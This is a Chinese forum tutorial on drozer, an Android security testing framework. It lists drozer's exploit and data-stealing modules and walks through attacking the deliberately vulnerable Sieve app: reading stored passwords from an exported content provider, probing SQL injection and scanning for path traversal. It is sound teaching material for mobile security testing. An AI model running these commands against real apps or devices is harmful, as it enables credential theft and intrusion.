找回密码
 立即注册→加入我们

QQ登录

只需一步,快速开始

搜索
热搜: 下载 VB C 实现 编写
查看: 5287|回复: 0

drozer入门讲解

[复制链接]

307

主题

228

回帖

7319

积分

用户组: 真·技术宅

UID
2
精华
76
威望
291 点
宅币
5569 个
贡献
253 次
宅之契约
0 份
在线时间
945 小时
注册时间
2014-1-25
发表于 2016-6-12 20:32:11 | 显示全部楼层 |阅读模式

欢迎访问技术宅的结界,请注册或者登录吧。

您需要 登录 才可以下载或查看,没有账号?立即注册→加入我们

×
DROZER 目录
DROZER. 1
一、windows上安装drozer. 1
二、drozer使用... 1
三、drozer模块... 6
查找可以处理给定intent数据的app. 6
查找导出的activity. 6
启动指定的activity. 7
四、实例... 8
五、百度钱包app分析... 10
  

一、windows上安装drozer1. 下载安装https://labs.mwrinfosecurity.com ... installer-2.3.4.zip
移动端安装https://labs.mwrinfosecurity.com ... zer-agent-2.3.4.apk
2. 移动端打开drozer Agent并开启服务器
3. adb forward tcp:31415 tcp:31415
4. 在drozer目录下命令行执行drozerconsole connect见到图案即为连接成功
二、drozer使用通用命令
usage: drozer [COMMAND]
Run `drozer [COMMAND] --help` for moreusage information.
Commands:
         console  start the drozer Console
          module  manage drozer modules
          server  start a drozer Server
              ssl  manage drozer SSL key material
         exploit  generate an exploit todeploy drozer
           agent  create custom drozer Agents
         payload  generate payloads todeploy drozer

模块管理
usage: module [COMMAND]
Run the drozer Module and RepositoryManager.
The Repository Manager handles drozerModules and Module Repositories.
positional arguments:
command             the command toexecute
options
optional arguments:
  -h,--help
  -d,--descriptions  include descriptions whensearching modules (searchonly)
  -f,--force         force install modulesfrom the repositories (installonly)
available commands:
commands    shows a list of allconsole commands
install     install a new module
remote      manage the sourcerepositories, from which you install modules
repository  manage modulerepositories, on your local system
search      search for modules

安装所有插件
for /F %i in ('drozer module search') dodrozer module install  %i
查看可用exploit插件
E:\drozer>drozer exploit list
exploit.remote.browser.addjavascriptinterface

WebViewaddJavascriptInterface Remote Code Execution(CVE-2012-6636)

exploit.remote.browser.knoxsmdm

Abuse the Newenrolment/UniversalMDMApplicationapplication in Samsung Knox suite to installrogue drozer agent

exploit.remote.browser.nanparse

Webkit InvalidNaN Parsing (CVE-2010-1807)

exploit.remote.browser.normalize

Webkit NodeNormalize (CVE-2010-1759)

exploit.remote.browser.useafterfree

Webkit Use AfterFree Exploit (Black Hat 2010)

exploit.remote.dos.remotewipe_browserdelivery

Invoke a USSDcode that performs a remote wipe on Samsung Galaxy SIII (Ekoparty 2012)

exploit.remote.fileformat.polarisviewerbof_browserdelivery

Deliver PolarisViewer 4 exploit files over browser  (Mobile Pwn2Own 2012)

exploit.remote.fileformat.polarisviewerbof_generate

Generate PolarisViewer 4 exploit DOCX (Mobile  Pwn2Own2012)

exploit.remote.socialengineering.unknownsources

Deliver theRogue drozer Agent over browser and hold thumbs the user will install it

exploit.usb.socialengineering.usbdebugging

Install a Roguedrozer Agent on a connected device that has USB debugging enabled


主界面
E:\drozer>drozer console connect
Selecting77dff31f0dc03413 (unknown Genymotion ('Phone' version) 2.3.7)
            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... . ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.
drozerConsole (v2.3.4)
dz>help
drozer:Android Security Assessment Framework
Type`help COMMAND` for more information on a particular command, or `help
MODULE`for a particular module.
Commands:
cd     contributors  env  help  load    permissions set    unset
clean  echo         exit  list  module run          shell
Miscellaneoushelp topics:
Intents

Load:文件作为脚本执行
Module:可执行drozer模块
Run:执行module
List:列出可执行模块

app.activity.forintent                          Find activities thatcan handle the given intent
app.activity.info                               Gets informationabout exported activities.
app.activity.start                              Start an Activity
app.broadcast.info                              Get informationabout broadcast receivers
app.broadcast.send                              Send broadcastusing an intent
app.broadcast.sniff                             Register abroadcast receiver that can sniff particular intents
app.package.attacksurface                       Get attack surface ofpackage
app.package.backup                     Lists packages that usethe backup API (returns true on FLAG_ALLOW_BACKUP)
app.package.debuggable                          Find debuggablepackages
app.package.info                                Get informationabout installed packages
app.package.launchintent                        Get launch intent ofpackage
app.package.list                                List Packages
app.package.manifest                            GetAndroidManifest.xml of package
app.package.native                              Find Nativelibraries embedded in the application.
app.package.shareduid                           Look for packageswith shared UIDs
app.provider.columns                            List columns incontent provider
app.provider.delete                             Delete from acontent provider
app.provider.download                           Download a file froma content provider that supports files
app.provider.finduri                            Find referencedcontent URIs in a package
app.provider.info                               Get informationabout exported content providers
app.provider.insert                             Insert into aContent Provider
app.provider.query                              Query a contentprovider
app.provider.read                               Read from acontent provider that supports files
app.provider.update                             Update a record ina content provider
app.service.info                                Get informationabout exported services
app.service.send                                Send a Messageto a service, and display the reply
app.service.start                               Start Service
app.service.stop                                Stop Service
auxiliary.develop.interactive                   Start an interactive Pythonshell
auxiliary.webcontentresolver                    Start a web serviceinterface to content providers.
exploit.badauth.callme1                         Exploit CVE-2013-6272to initiate or kill phone calls.
exploit.badauth.callme2                         Exploit CVE-2014-N/Ato conduct phone calls or send special codes.
exploit.badauth.smsdraftsend                    Exploit CVE-2014-8610Android < 5.0 SMS resend vulnerability (Baidu X-Team)
exploit.badauth.unlock                          Exploit CVE-2013-6271to delete all locks on device.
exploit.jdwp.check                              Open@jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider              Reads APN content provider
exploit.pilfer.general.settingsprovider         Reads Settings content provider
exploit.pilfer.oem.samsung.accuweather          Tests for Content Providervulnerability in com.sec.android.widgetapp.weatherclock.
exploit.pilfer.oem.samsung.appassword           Tests for vulnerability incontent://settings/secure, that reveals Personal Hotspot AP password.
exploit.pilfer.oem.samsung.channelssms          Tests for Content Providervulnerability in com.android.providers.telephony.
exploit.pilfer.oem.samsung.im                   Tests for Content Providervulnerability in com.sec.android.im.
exploit.pilfer.oem.samsung.logs.email           Tests for Content Providervulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.im              Tests for Content Providervulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.messaging       Tests for Content Provider vulnerabilityin com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.memo                 Tests for Content Providervulnerability in com.sec.android.app.memo.
exploit.pilfer.oem.samsung.minidiary            Tests for Content Providervulnerability in com.sec.android.app.minidiary.
exploit.pilfer.oem.samsung.postit               Tests for Content Providervulnerability in com.sec.android.widgetapp.postit.
exploit.pilfer.oem.samsung.social_hub.im        Tests for Content Providervulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.impassword
                                               Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.instantmessages
                                               Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.messages  Tests for Content Provider vulnerability incom.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.registeredaccounts
                                               Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.thirdparty.idea.superbackup.calls
                                               Grab call logs exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.contacts
                                               Grab Contact details exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.smses
                                               Grab SMS messages exported by Super Backup
exploit.pilfer.thirdparty.inkpad.notes.list     Lists notes created with the InkPadapplication
exploit.pilfer.thirdparty.inkpad.notes.note     Reads notes created with the InkPadapplication.
exploit.pilfer.thirdparty.maildroid.emails      Grab Email messages from MailDroid
exploit.pilfer.thirdparty.seesmic.twitter.oauthtokens
                                               Extracts the Twitter Secret from Seesmic
exploit.pilfer.thirdparty.shazam.gps            Extract GPS location information.
exploit.pilfer.thirdparty.sophos.mobilecontrol.messages
                                               Steal the Messages database from Sophos Mobile Control
exploit.root.cmdclient                          Obtain a root shellon an Acer Iconia and various Motorola devices.
exploit.root.exynosmem                          Obtain a root shellon Samsung Galaxy S2, S3, Note 2 and some other devices.
exploit.root.huaweip2                           Obtain a root shellon a Huawei P2.
exploit.root.mmap_abuse                         Iterate through alldevices and attempt to exploit them to gain a root shell by abusing the
                                                mmap device operation.
exploit.root.towelroot                          Obtain a root shellon devices running Android 4.4 KitKat and/or kernel build date < Jun 3
                                               2014.
exploit.root.ztesyncagent                       Obtain a root shell on aZTE Score M and ZTE Skate.
information.datetime                            Print Date/Time
information.deviceinfo                          Get verbose deviceinformation
information.permissions                         Get a list of all permissions usedby packages on the device
intents.fuzzinozer                              fuzzinozer
post.capture.clipboard                          Retrieve and displaythe current clipboard text.
post.capture.location                           Get last known GPScoordinates of user
post.capture.screenrecording                    Take a video recording ofthe device's screen
post.capture.screenshot                         Take a screenshot ofthe device
post.perform.setclipboard                       Put the specified textinto the clipboard.
post.perform.startinstalledagent                Start installed drozer agent.
post.pivot.portforward                          Start a port forward
scanner.activity.browsable                      Get all BROWSABLE activities that can beinvoked from the web browser
scanner.malware.virustotal                      Virus Scanner
scanner.misc.checkjavascriptbridge              Check if addJavascriptInterfaceis used and can be abused
scanner.misc.native                             Find nativecomponents included in packages
scanner.misc.readablefiles                      Find world-readable filesin the given folder
scanner.misc.secretcodes                        Search for secret codesthat can be used from the dialer
scanner.misc.securerandom                       SecureRandom Check
scanner.misc.sflagbinaries                      Find suid/sgid binariesin the given folder (default is /system).
scanner.misc.weburls                            Find HTTP and HTTPSURLs specified in packages.
scanner.misc.writablefiles                      Find world-writable filesin the given folder
scanner.oem.samsung                             Test for multipleSamsung content provider vulnerabilities
scanner.provider.finduris                       Search for contentproviders that can be queried from our context.
scanner.provider.injection                      Test content providersfor SQL injection vulnerabilities.
scanner.provider.sqltables                      Find tables accessible through SQL injectionvulnerabilities.
scanner.provider.traversal                      Test content providersfor basic directory traversal vulnerabilities.
scanner.root.check                              Test forvulnerabilities that allow a malicious application to gain root access.
shell.exec                                      Execute asingle Linux command.
shell.send                                      Send anASH shell to a remote listener.
shell.start                                     Enter into an interactive Linuxshell.
tools.file.download                             Download a File
tools.file.md5sum                               Get md5 Checksumof file
tools.file.size                                 Get size offile
tools.file.upload                               Upload a File
tools.misc.installcert                          Install CAcertificate
tools.setup.busybox                             Install Busybox.
tools.setup.minimalsu                           Prepare 'minimal-su'binary installation on the device.
tools.setup.nmap                                Install Nmap.
tools.setup.sqlite3                             Install SQLite3.

三、drozer模块查找可以处理给定intent数据的appusage: run app.activity.forintent [-h][--action ACTION] [--category CATEGORY [CATEGORY ...]]
              [--component PACKAGE COMPONENT][--data-uri DATA_URI]
              [--extra TYPE KEY VALUE] [--flagsFLAGS [FLAGS ...]]
              [--mimetype MIMETYPE]

Find activities that can handle the formulatedintent

Examples:
Find activities that can handle webaddresses:

   dz> run app.activity.forintent
                --actionandroid.intent.action.VIEW
                --data http://www.google.com

   Package name: com.android.browser
   Target activity: com.android.browser.BrowserActivity

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h,--help
--action ACTION       specify theaction to include in the Intent
--category CATEGORY [CATEGORY ...]
                        specify the category toinclude in the Intent
--component PACKAGE COMPONENT
                        specify the componentname to include in the Intent
--data-uri DATA_URI   specify aUri to attach as data in the Intent
--extra TYPE KEY VALUE
                        add an field to theIntent's extras bundle
--flags FLAGS [FLAGS ...]
                        specify one-or-moreflags to include in the Intent
--mimetype MIMETYPE   specify theMIME type to send in the Intent

查找导出的activityusage: run app.activity.info [-h] [-aPACKAGE] [-f FILTER] [-i] [-u] [-v]

Gets information about exported activities.

Examples:
List activities exported by the Browser:

   dz> run app.activity.info --package com.android.browser
   Package: com.android.browser
     com.android.browser.BrowserActivity
     com.android.browser.ShortcutActivity
     com.android.browser.BrowserPreferencesPage
     com.android.browser.BookmarkSearch
     com.android.browser.AddBookmarkPage
     com.android.browser.widget.BookmarkWidgetConfigure

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h,--help
  -aPACKAGE, --package PACKAGE
                        specify the package toinspect
  -fFILTER, --filter FILTER
                        specify a filter termfor the activity name
  -i,--show-intent-filters
                        specify whether toinclude intent filters
  -u,--unexported      include activities thatare not exported
  -v,--verbose         be verbose

启动指定的activityusage: run app.activity.start [-h][--action ACTION] [--category CATEGORY [CATEGORY ...]]
              [--component PACKAGE COMPONENT][--data-uri DATA_URI]
              [--extra TYPE KEY VALUE] [--flagsFLAGS [FLAGS ...]]
              [--mimetype MIMETYPE]

Starts an Activity using the formulatedintent.

Examples:
Start the Browser with an explicit intent:

   dz> run app.activity.start
                --component com.android.browser
                           com.android.browser.BrowserActivity
                --flags ACTIVITY_NEW_TASK

If no flags are specified, drozer will addthe ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:

   dz> run app.activity.start
                --component com.android.browser
                           com.android.browser.BrowserActivity
                --flags 0x0

Starting the Browser with an implicitintent:

   dz> run app.activity.start
                --actionandroid.intent.action.VIEW
                --data-urihttp://www.google.com
                --flags ACTIVITY_NEW_TASK

For more information on how to formulate anIntent, type 'help intents'.

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
  -h,--help
--action ACTION       specify theaction to include in the Intent
--category CATEGORY [CATEGORY ...]
                        specify the category toinclude in the Intent
--component PACKAGE COMPONENT
                        specify the componentname to include in the Intent
--data-uri DATA_URI   specify aUri to attach as data in the Intent
--extra TYPE KEY VALUE
                        add an field to theIntent's extras bundle
--flags FLAGS [FLAGS ...]
                        specify one-or-moreflags to include in the Intent
--mimetype MIMETYPE   specify theMIME type to send in the Intent



四、实例1.下载安装sieve app        http://mwr.to/sieve
2.查看包名
dz> run app.package.list -f sievecom.mwr.example.sieve
3.查看基本信息
dz> run app.package.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory:/data/data/com.mwr.example.sieve
APK Path:/data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
4. 查找攻击点
dz> run app.package.attacksurfacecom.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
可攻击activity
dz> run app.activity.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList
可攻击provider
dz> run app.provider.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
Authority:com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider:com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission:com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority:com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider:com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
尝试启动
dz> run app.activity.start --componentcom.mwr.example.sieve com.mwr.example.sieve.PWList
5.攻击content provider
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==(Base64-encoded)
email: incognitoguy50@gmail.com
sql注入
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'"
unrecognized token: "' FROMPasswords" (code 1): , while compiling: SELECT '
FROM Passwords
dz> run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'"
unrecognized token: "')" (code1): , while compiling: SELECT * FROM Passwords
WHERE (')
Contentprovider弱点
dz> run scanner.provider.injection -acom.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.traversal -acom.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
6.攻击service
dz> run app.service.info -acom.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
回复

使用道具 举报

QQ|Archiver|小黑屋|技术宅的结界 ( 滇ICP备16008837号 )|网站地图

GMT+8, 2024-3-29 21:48 , Processed in 0.045947 second(s), 32 queries , Gzip On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表